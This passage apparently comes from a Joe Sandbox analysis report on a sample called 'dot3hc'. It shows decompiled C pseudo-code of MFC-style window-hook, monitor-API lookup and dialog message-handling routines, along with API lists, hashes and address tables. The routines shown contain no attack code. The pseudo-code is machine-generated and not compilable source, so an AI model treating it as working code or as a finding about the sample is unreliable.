                                                      						_t88 = E00403EE9(_t87, "ime");
                                                      						__eflags = _t88;
                                                      						_pop(_t97);
                                                      						if(_t88 == 0) {
                                                      							goto L27;
                                                      						}
                                                      						goto L12;
                                                      					}
                                                      					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                      					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                      						goto L27;
                                                      					}
                                                      					__eflags = _t56;
                                                      					if(_t56 != 0) {
                                                      						goto L27;
                                                      					}
                                                      					goto L7;
                                                      				} else {
                                                      					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                      					L30:
                                                      					return E0041F7D6(_t94, _t105, _t110);
                                                      				}
                                                      			}




























                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0040B4FF
                                                        • Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B
                                                      • CallNextHookEx.USER32(?,?,?,?), ref: 0040B543
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetClassLongA.USER32 ref: 0040B587
                                                      • GlobalGetAtomNameA.KERNEL32 ref: 0040B5B1
                                                      • SetWindowLongA.USER32 ref: 0040B606
                                                      • _memset.LIBCMT ref: 0040B650
                                                      • GetClassLongA.USER32 ref: 0040B680
                                                      • GetClassNameA.USER32(?,?,00000100), ref: 0040B6A1
                                                      • GetWindowLongA.USER32 ref: 0040B6C5
                                                      • GetPropA.USER32 ref: 0040B6DF
                                                      • SetPropA.USER32 ref: 0040B6EA
                                                      • GetPropA.USER32 ref: 0040B6F2
                                                      • GlobalAddAtomA.KERNEL32 ref: 0040B6FA
                                                      • SetWindowLongA.USER32 ref: 0040B708
                                                      • CallNextHookEx.USER32(?,00000003,?,?), ref: 0040B720
                                                      • UnhookWindowsHookEx.USER32(?), ref: 0040B734
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                      • String ID: #32768$,dD$AfxOldWndProc423$ime
                                                      • API String ID: 1191297049-714433792
                                                      • Opcode ID: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
                                                      • Instruction ID: 84e3f26e1d5758fcd2ef64f535b58e951b2309da213ef0e04ba7174f59460a39
                                                      • Opcode Fuzzy Hash: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
                                                      • Instruction Fuzzy Hash: 44619071900219ABDB209B61DD49BEB7BB8EF44325F100576F905B32D1C7389A81CBDD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E00407777() {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				struct HINSTANCE__* _t5;
                                                      				_Unknown_base(*)()* _t6;
                                                      				_Unknown_base(*)()* _t7;
                                                      				_Unknown_base(*)()* _t8;
                                                      				_Unknown_base(*)()* _t9;
                                                      				_Unknown_base(*)()* _t10;
                                                      				_Unknown_base(*)()* _t11;
                                                      				_Unknown_base(*)()* _t12;
                                                      				struct HINSTANCE__* _t18;
                                                      				void* _t20;
                                                      				intOrPtr _t23;
                                                      				_Unknown_base(*)()* _t24;
                                                      
                                                      				_t23 =  *0x44629c; // 0x0
                                                      				if(_t23 == 0) {
                                                      					_push(_t20);
                                                      					 *0x4462a0 = E0040771F(0, _t20, __eflags);
                                                      					_t18 = GetModuleHandleA("USER32");
                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						L12:
                                                      						 *0x446280 = 0;
                                                      						 *0x446284 = 0;
                                                      						 *0x446288 = 0;
                                                      						 *0x44628c = 0;
                                                      						 *0x446290 = 0;
                                                      						 *0x446294 = 0;
                                                      						 *0x446298 = 0;
                                                      						_t5 = 0;
                                                      					} else {
                                                      						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                      						__eflags = _t6;
                                                      						 *0x446280 = _t6;
                                                      						if(_t6 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                      							__eflags = _t7;
                                                      							 *0x446284 = _t7;
                                                      							if(_t7 == 0) {
                                                      								goto L12;
                                                      							} else {
                                                      								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                      								__eflags = _t8;
                                                      								 *0x446288 = _t8;
                                                      								if(_t8 == 0) {
                                                      									goto L12;
                                                      								} else {
                                                      									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                      									__eflags = _t9;
                                                      									 *0x44628c = _t9;
                                                      									if(_t9 == 0) {
                                                      										goto L12;
                                                      									} else {
                                                      										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                      										__eflags = _t10;
                                                      										 *0x446294 = _t10;
                                                      										if(_t10 == 0) {
                                                      											goto L12;
                                                      										} else {
                                                      											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                      											__eflags = _t11;
                                                      											 *0x446290 = _t11;
                                                      											if(_t11 == 0) {
                                                      												goto L12;
                                                      											} else {
                                                      												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                      												__eflags = _t12;
                                                      												 *0x446298 = _t12;
                                                      												if(_t12 == 0) {
                                                      													goto L12;
                                                      												} else {
                                                      													_t5 = 1;
                                                      													__eflags = 1;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					 *0x44629c = 1;
                                                      					return _t5;
                                                      				} else {
                                                      					_t24 =  *0x446290; // 0x0
                                                      					return 0 | _t24 != 0x00000000;
                                                      				}
                                                      			}


















                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,004078C3,?,?,?,?,?,?,?,00409759,00000000,00000002,00000028), ref: 004077A0
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004077BC
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004077CD
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004077DE
                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004077EF
                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00407800
                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00407811
                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00407822
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                      • API String ID: 667068680-68207542
                                                      • Opcode ID: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
                                                      • Instruction ID: 460c29bc39fe871b276e37692eac700ddae52ba8710db786ada5c1a6ecd8e9b2
                                                      • Opcode Fuzzy Hash: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
                                                      • Instruction Fuzzy Hash: E52181B5E05A05BBC7017F29ACC542ABBE4B28B74036655BFE008E22A0D7BC6045DF5F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0041947F(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v24;
                                                      				int _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				struct HWND__* _v52;
                                                      				signed int _t139;
                                                      				signed int _t141;
                                                      				void* _t142;
                                                      				signed int _t146;
                                                      				signed int _t149;
                                                      				intOrPtr _t150;
                                                      				signed int _t152;
                                                      				signed char _t153;
                                                      				signed int _t154;
                                                      				signed int _t155;
                                                      				int _t156;
                                                      				signed int _t161;
                                                      				signed int _t165;
                                                      				void* _t167;
                                                      				signed char _t171;
                                                      				signed int _t172;
                                                      				signed int _t173;
                                                      				signed int _t174;
                                                      				signed char _t182;
                                                      				intOrPtr _t183;
                                                      				signed int _t184;
                                                      				short _t188;
                                                      				signed int _t189;
                                                      				signed int _t190;
                                                      				signed int _t191;
                                                      				signed int _t195;
                                                      				signed int _t198;
                                                      				signed char _t199;
                                                      				signed int _t200;
                                                      				signed int _t201;
                                                      				short _t204;
                                                      				signed int _t206;
                                                      				signed int _t207;
                                                      				signed int _t208;
                                                      				signed int _t209;
                                                      				void* _t211;
                                                      				signed int _t215;
                                                      				signed int _t216;
                                                      				struct HWND__* _t217;
                                                      				struct tagMSG* _t221;
                                                      				intOrPtr _t224;
                                                      				void* _t231;
                                                      				void* _t234;
                                                      				struct tagMSG* _t240;
                                                      				signed int _t242;
                                                      				int _t243;
                                                      				signed int _t244;
                                                      				long _t247;
                                                      				intOrPtr _t249;
                                                      				signed int _t251;
                                                      				signed int _t254;
                                                      				signed int _t255;
                                                      				signed int _t256;
                                                      				signed int _t257;
                                                      				signed int _t258;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      
                                                      				_t232 = __ecx;
                                                      				_t260 = _t262;
                                                      				_push(__ecx);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t139 = E004192DC(_a4, _a8);
                                                      				_t238 = _t139;
                                                      				if(_t139 == 0) {
                                                      					_t232 = _a4;
                                                      					_t231 = E004085E2(_a4);
                                                      					if(_t231 != 0) {
                                                      						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                      						_a8 = _t221;
                                                      						if(_t221 != 0) {
                                                      							while(1) {
                                                      								_t9 = _t231 + 0x40; // 0x40
                                                      								_t232 = _t9;
                                                      								_t258 =  *(E00406B97( &_a8));
                                                      								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                      								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                      									break;
                                                      								}
                                                      								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                      									if(_a8 != 0) {
                                                      										continue;
                                                      									} else {
                                                      									}
                                                      								} else {
                                                      									break;
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      							_t238 = _t258;
                                                      						}
                                                      					}
                                                      				}
                                                      				L10:
                                                      				_t247 = 0;
                                                      				while(1) {
                                                      					_t238 = E0041932E(_t232, _a4, _t238, _a12);
                                                      					if(_t238 == 0) {
                                                      						break;
                                                      					}
                                                      					_t142 = E00418DD9(_t238);
                                                      					_pop(_t232);
                                                      					if(_t142 == 0) {
                                                      						L14:
                                                      						if(_t238 == 0) {
                                                      							L21:
                                                      							__eflags =  *(_t238 + 4);
                                                      							if(__eflags == 0) {
                                                      								E004037E3(0, _t232, _t238, _t247, __eflags);
                                                      								asm("int3");
                                                      								_push(0x28);
                                                      								E0041F71D(E004333FF, 0, _t238, _t247);
                                                      								_t146 = _a4;
                                                      								__eflags = _t146;
                                                      								if(_t146 != 0) {
                                                      									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                      								} else {
                                                      									_v48 = _v48 & _t146;
                                                      								}
                                                      								_t240 = _a8;
                                                      								_t249 = _t240->message;
                                                      								_v32 = _t249;
                                                      								_v52 = GetFocus();
                                                      								_t149 = E00409C97(0, _t232, _t260, _t148);
                                                      								_t229 = 0x100;
                                                      								__eflags = _t249 - 0x100;
                                                      								_v24 = _t149;
                                                      								if(_t249 < 0x100) {
                                                      									L34:
                                                      									__eflags = _t249 + 0xfffffe00 - 9;
                                                      									if(_t249 + 0xfffffe00 > 9) {
                                                      										goto L56;
                                                      									} else {
                                                      										goto L35;
                                                      									}
                                                      								} else {
                                                      									__eflags = _t249 - 0x109;
                                                      									if(_t249 <= 0x109) {
                                                      										L35:
                                                      										__eflags = _t149;
                                                      										if(_t149 == 0) {
                                                      											L56:
                                                      											_t251 = 0;
                                                      											_v28 = 0;
                                                      											_t150 = E00409C97(_t229, _t232, _t260,  *_t240);
                                                      											_v44 = _v44 & 0;
                                                      											_v36 = _t150;
                                                      											_t152 = _v32 - _t229;
                                                      											__eflags = _t152;
                                                      											_v40 = 2;
                                                      											if(_t152 == 0) {
                                                      												_t153 = E00418D8C(_v36, _t240);
                                                      												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                      												__eflags = _t232 - 0x1b;
                                                      												if(__eflags > 0) {
                                                      													__eflags = _t232 - 0x25;
                                                      													if(_t232 < 0x25) {
                                                      														goto L75;
                                                      													} else {
                                                      														__eflags = _t232 - 0x26;
                                                      														if(_t232 <= 0x26) {
                                                      															_v44 = 1;
                                                      															goto L110;
                                                      														} else {
                                                      															__eflags = _t232 - 0x28;
                                                      															if(_t232 <= 0x28) {
                                                      																L110:
                                                      																_t171 = E00418D8C(_v24, _t240);
                                                      																__eflags = _t171 & 0x00000001;
                                                      																if((_t171 & 0x00000001) != 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	__eflags = _v44;
                                                      																	_t232 = _a4;
                                                      																	_push(0);
                                                      																	if(_v44 == 0) {
                                                      																		_t172 = E0040D2C7(_t229, _t232, _t240);
                                                      																	} else {
                                                      																		_t172 = E0040D279(_t229, _t232, _t240);
                                                      																	}
                                                      																	_t254 = _t172;
                                                      																	__eflags = _t254;
                                                      																	if(_t254 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		__eflags =  *(_t254 + 8);
                                                      																		if( *(_t254 + 8) != 0) {
                                                      																			_t232 = _a4;
                                                      																			E0040CE23(_a4, _t254);
                                                      																		}
                                                      																		__eflags =  *(_t254 + 4);
                                                      																		if( *(_t254 + 4) == 0) {
                                                      																			_t173 =  *_t254;
                                                      																			__eflags = _t173;
                                                      																			if(_t173 == 0) {
                                                      																				_t232 = _a4;
                                                      																				_t174 = E00418E4A(_a4, _v24, _v44);
                                                      																			} else {
                                                      																				_t174 = E00409C97(_t229, _t232, _t260, _t173);
                                                      																			}
                                                      																			_t242 = _t174;
                                                      																			__eflags = _t242;
                                                      																			if(_t242 == 0) {
                                                      																				goto L75;
                                                      																			} else {
                                                      																				_t229 = 0;
                                                      																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                      																				E00418E84(_t242);
                                                      																				__eflags =  *(_t254 + 8);
                                                      																				if( *(_t254 + 8) != 0) {
                                                      																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                      																				}
                                                      																				goto L125;
                                                      																			}
                                                      																		} else {
                                                      																			_t232 =  *(_t254 + 4);
                                                      																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                      																			goto L125;
                                                      																		}
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																__eflags = _t232 - 0x2b;
                                                      																if(_t232 != 0x2b) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	goto L97;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													goto L126;
                                                      												} else {
                                                      													if(__eflags == 0) {
                                                      														L103:
                                                      														_t243 = 0;
                                                      														__eflags = 0;
                                                      														goto L104;
                                                      													} else {
                                                      														__eflags = _t232 - 3;
                                                      														if(_t232 == 3) {
                                                      															goto L103;
                                                      														} else {
                                                      															__eflags = _t232 - 9;
                                                      															if(_t232 == 9) {
                                                      																__eflags = _t153 & 0x00000002;
                                                      																if((_t153 & 0x00000002) != 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	_t188 = GetKeyState(0x10);
                                                      																	_t255 = _a4;
                                                      																	__eflags = _t188;
                                                      																	_t229 = 0 | _t188 < 0x00000000;
                                                      																	_t232 = _t255;
                                                      																	_t189 = E0040CCE0(_t255, 0, _t188 < 0);
                                                      																	__eflags = _t189;
                                                      																	if(_t189 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		__eflags =  *(_t189 + 4);
                                                      																		if( *(_t189 + 4) == 0) {
                                                      																			_t190 =  *_t189;
                                                      																			__eflags = _t190;
                                                      																			if(_t190 == 0) {
                                                      																				_t232 = _t255;
                                                      																				_t191 = E00405D69(_t255, _v36, _t229);
                                                      																			} else {
                                                      																				_t191 = E00409C97(_t229, _t232, _t260, _t190);
                                                      																			}
                                                      																			_t244 = _t191;
                                                      																			__eflags = _t244;
                                                      																			if(_t244 != 0) {
                                                      																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                      																				E00418E84(_t244);
                                                      																				E0041904E(_t229, _t232, _t260, _v24, _t244);
                                                      																				_pop(_t232);
                                                      																			}
                                                      																		} else {
                                                      																			_t195 =  *(_t189 + 4);
                                                      																			_t232 = _t195;
                                                      																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                      																		}
                                                      																		goto L125;
                                                      																	}
                                                      																}
                                                      																goto L126;
                                                      															} else {
                                                      																__eflags = _t232 - 0xd;
                                                      																if(_t232 == 0xd) {
                                                      																	L97:
                                                      																	__eflags = _t153 & 0x00000004;
                                                      																	if((_t153 & 0x00000004) != 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		_t182 = E00418E29(_v24);
                                                      																		__eflags = _t182 & 0x00000010;
                                                      																		_pop(_t232);
                                                      																		if((_t182 & 0x00000010) == 0) {
                                                      																			_t183 = E004191CF(_a4);
                                                      																		} else {
                                                      																			_t251 = _v24;
                                                      																			_t232 = _t251;
                                                      																			_t183 = E0040C9F6(_t251);
                                                      																		}
                                                      																		_t243 = 0;
                                                      																		__eflags = _t251;
                                                      																		_v40 = _t183;
                                                      																		if(_t251 != 0) {
                                                      																			L105:
                                                      																			_t232 = _t251;
                                                      																			_t184 = E0040CA70(_t251);
                                                      																			__eflags = _t184;
                                                      																			if(_t184 != 0) {
                                                      																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                      																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                      																					goto L75;
                                                      																				} else {
                                                      																					_push(_t243);
                                                      																					_push(_t243);
                                                      																					_push(_t243);
                                                      																					_push(1);
                                                      																					_push(0xfffffdd9);
                                                      																					_push(_t251);
                                                      																					_v8 = _t243;
                                                      																					E0040CACD();
                                                      																					_v8 = _v8 | 0xffffffff;
                                                      																					goto L125;
                                                      																				}
                                                      																			} else {
                                                      																				MessageBeep(_t243);
                                                      																				goto L75;
                                                      																			}
                                                      																		} else {
                                                      																			L104:
                                                      																			_t251 = E004190C9(_a4, _v40);
                                                      																			__eflags = _t251 - _t243;
                                                      																			if(_t251 == _t243) {
                                                      																				goto L75;
                                                      																			} else {
                                                      																				goto L105;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																	goto L126;
                                                      																} else {
                                                      																	goto L75;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												goto L79;
                                                      											} else {
                                                      												_t198 = _t152;
                                                      												__eflags = _t198;
                                                      												if(_t198 == 0) {
                                                      													L62:
                                                      													_t199 = E00418D8C(_v36, _t240);
                                                      													__eflags = _v32 - 0x102;
                                                      													if(_v32 != 0x102) {
                                                      														L64:
                                                      														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                      														__eflags = _t232 - 9;
                                                      														if(_t232 != 9) {
                                                      															L66:
                                                      															__eflags = _t232 - 0x20;
                                                      															if(__eflags == 0) {
                                                      																goto L54;
                                                      															} else {
                                                      																_push(_t240);
                                                      																_t200 = E0041947F(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                      																__eflags = _t200;
                                                      																if(_t200 == 0) {
                                                      																	goto L75;
                                                      																} else {
                                                      																	_t201 =  *(_t200 + 4);
                                                      																	__eflags = _t201;
                                                      																	if(_t201 == 0) {
                                                      																		goto L75;
                                                      																	} else {
                                                      																		_t232 = _t201;
                                                      																		E004133E2(_t201, _t240);
                                                      																		L125:
                                                      																		_v28 = 1;
                                                      																	}
                                                      																}
                                                      																goto L79;
                                                      															}
                                                      														} else {
                                                      															__eflags = _t199 & 0x00000002;
                                                      															if((_t199 & 0x00000002) != 0) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L66;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														__eflags = _t199 & 0x00000084;
                                                      														if((_t199 & 0x00000084) != 0) {
                                                      															goto L75;
                                                      														} else {
                                                      															goto L64;
                                                      														}
                                                      													}
                                                      												} else {
                                                      													__eflags = _t198 != 4;
                                                      													if(_t198 != 4) {
                                                      														L75:
                                                      														_t154 = _a4;
                                                      														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                      														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                      															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                      															__eflags = _t165;
                                                      															_v28 = _t165;
                                                      															if(_t165 != 0) {
                                                      																_t167 = E00409C97(_t229, _t232, _t260, GetFocus());
                                                      																__eflags = _t167 - _v24;
                                                      																if(_t167 != _v24) {
                                                      																	E00418FE1(_t232, E00409C97(_t229, _t232, _t260, GetFocus()));
                                                      																	_pop(_t232);
                                                      																}
                                                      															}
                                                      														}
                                                      														L79:
                                                      														_t155 = IsWindow(_v52);
                                                      														__eflags = _t155;
                                                      														if(_t155 != 0) {
                                                      															E0041904E(_t229, _t232, _t260, _v24, E00409C97(_t229, _t232, _t260, GetFocus()));
                                                      															_pop(_t234);
                                                      															_t161 = IsWindow(_v48);
                                                      															__eflags = _t161;
                                                      															if(_t161 != 0) {
                                                      																E004191FC(_a4, _v24, E00409C97(_t229, _t234, _t260, GetFocus()));
                                                      															}
                                                      														}
                                                      														_t156 = _v28;
                                                      													} else {
                                                      														__eflags = _v24;
                                                      														if(_v24 != 0) {
                                                      															L61:
                                                      															__eflags =  *(_t240 + 8) - 0x20;
                                                      															if( *(_t240 + 8) == 0x20) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L62;
                                                      															}
                                                      														} else {
                                                      															_t204 = GetKeyState(0x12);
                                                      															__eflags = _t204;
                                                      															if(_t204 >= 0) {
                                                      																goto L75;
                                                      															} else {
                                                      																goto L61;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										} else {
                                                      											_t256 = _t149;
                                                      											while(1) {
                                                      												__eflags =  *(_t256 + 0x50);
                                                      												if( *(_t256 + 0x50) != 0) {
                                                      													break;
                                                      												}
                                                      												_t211 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                      												__eflags = _t211 - _a4;
                                                      												if(_t211 != _a4) {
                                                      													_t256 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
                                                      													__eflags = _t256;
                                                      													if(_t256 != 0) {
                                                      														continue;
                                                      													}
                                                      												}
                                                      												break;
                                                      											}
                                                      											__eflags = _t256;
                                                      											if(_t256 == 0) {
                                                      												L45:
                                                      												__eflags = _v32 - 0x101;
                                                      												if(_v32 == 0x101) {
                                                      													L48:
                                                      													__eflags = _t256;
                                                      													if(_t256 == 0) {
                                                      														goto L55;
                                                      													} else {
                                                      														_t257 =  *(_t256 + 0x50);
                                                      														__eflags = _t257;
                                                      														if(_t257 == 0) {
                                                      															goto L55;
                                                      														} else {
                                                      															_t206 = _a8->wParam & 0x0000ffff;
                                                      															__eflags = _t206 - 0xd;
                                                      															if(_t206 != 0xd) {
                                                      																L52:
                                                      																__eflags = _t206 - 0x1b;
                                                      																if(_t206 != 0x1b) {
                                                      																	goto L55;
                                                      																} else {
                                                      																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                      																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                      																		goto L55;
                                                      																	} else {
                                                      																		goto L54;
                                                      																	}
                                                      																}
                                                      															} else {
                                                      																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                      																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                      																	L54:
                                                      																	_t156 = 0;
                                                      																} else {
                                                      																	goto L52;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												} else {
                                                      													__eflags = _v32 - _t229;
                                                      													if(_v32 == _t229) {
                                                      														goto L48;
                                                      													} else {
                                                      														__eflags = _v32 - 0x102;
                                                      														if(_v32 != 0x102) {
                                                      															L55:
                                                      															_t240 = _a8;
                                                      															goto L56;
                                                      														} else {
                                                      															goto L48;
                                                      														}
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t207 =  *(_t256 + 0x50);
                                                      												__eflags = _t207;
                                                      												if(_t207 == 0) {
                                                      													goto L45;
                                                      												} else {
                                                      													__eflags =  *(_t207 + 0x58);
                                                      													if( *(_t207 + 0x58) == 0) {
                                                      														goto L45;
                                                      													} else {
                                                      														_t208 =  *(_t207 + 0x58);
                                                      														_t232 =  *_t208;
                                                      														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                      														__eflags = _t209;
                                                      														if(_t209 != 0) {
                                                      															goto L45;
                                                      														} else {
                                                      															_t156 = _t209 + 1;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L34;
                                                      									}
                                                      								}
                                                      								return E0041F7C2(_t156);
                                                      							} else {
                                                      								_t232 =  *(_t238 + 4);
                                                      								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                      								__eflags = _t215 & 0x08000000;
                                                      								if((_t215 & 0x08000000) == 0) {
                                                      									goto L20;
                                                      								} else {
                                                      									goto L23;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t216 =  *(_t238 + 4);
                                                      							if(_t216 == 0) {
                                                      								_t217 =  *_t238;
                                                      							} else {
                                                      								_t217 =  *(_t216 + 0x24);
                                                      							}
                                                      							if(_t217 == 0) {
                                                      								goto L21;
                                                      							} else {
                                                      								if(IsWindowEnabled(_t217) == 0) {
                                                      									L23:
                                                      									__eflags = _t238 - _v8;
                                                      									if(_t238 == _v8) {
                                                      										break;
                                                      									} else {
                                                      										__eflags = _v8;
                                                      										if(_v8 == 0) {
                                                      											_v8 = _t238;
                                                      										}
                                                      										_t247 = _t247 + 1;
                                                      										__eflags = _t247 - 0x200;
                                                      										if(_t247 < 0x200) {
                                                      											continue;
                                                      										} else {
                                                      											break;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									L20:
                                                      									_t141 = _t238;
                                                      									L28:
                                                      									return _t141;
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t232 = _a4;
                                                      						_t238 = E0040CCE0(_a4, _t238, 0);
                                                      						if(_t238 == 0) {
                                                      							break;
                                                      						} else {
                                                      							goto L14;
                                                      						}
                                                      					}
                                                      					L126:
                                                      				}
                                                      				_t141 = 0;
                                                      				__eflags = 0;
                                                      				goto L28;
                                                      			}

                                                      0x0041989d
                                                      0x004198a2
                                                      0x004198a4
                                                      0x004198a5
                                                      0x004198b6
                                                      0x004198a7
                                                      0x004198a7
                                                      0x004198aa
                                                      0x004198ac
                                                      0x004198ac
                                                      0x004198bb
                                                      0x004198bd
                                                      0x004198bf
                                                      0x004198c2
                                                      0x004198dd
                                                      0x004198dd
                                                      0x004198df
                                                      0x004198e4
                                                      0x004198e6
                                                      0x004198f4
                                                      0x004198f7
                                                      0x00000000
                                                      0x004198fd
                                                      0x004198fd
                                                      0x004198fe
                                                      0x004198ff
                                                      0x00419900
                                                      0x00419902
                                                      0x00419907
                                                      0x00419908
                                                      0x0041990b
                                                      0x00419913
                                                      0x00000000
                                                      0x00419913
                                                      0x004198e8
                                                      0x004198e9
                                                      0x00000000
                                                      0x004198e9
                                                      0x004198c4
                                                      0x004198c8
                                                      0x004198d3
                                                      0x004198d5
                                                      0x004198d7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004198d7
                                                      0x004198c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00419752
                                                      0x00419749
                                                      0x00419740
                                                      0x00419737
                                                      0x00000000
                                                      0x004196a1
                                                      0x004196a2
                                                      0x004196a2
                                                      0x004196a3
                                                      0x004196cf
                                                      0x004196d3
                                                      0x004196d8
                                                      0x004196df
                                                      0x004196e5
                                                      0x004196e5
                                                      0x004196e9
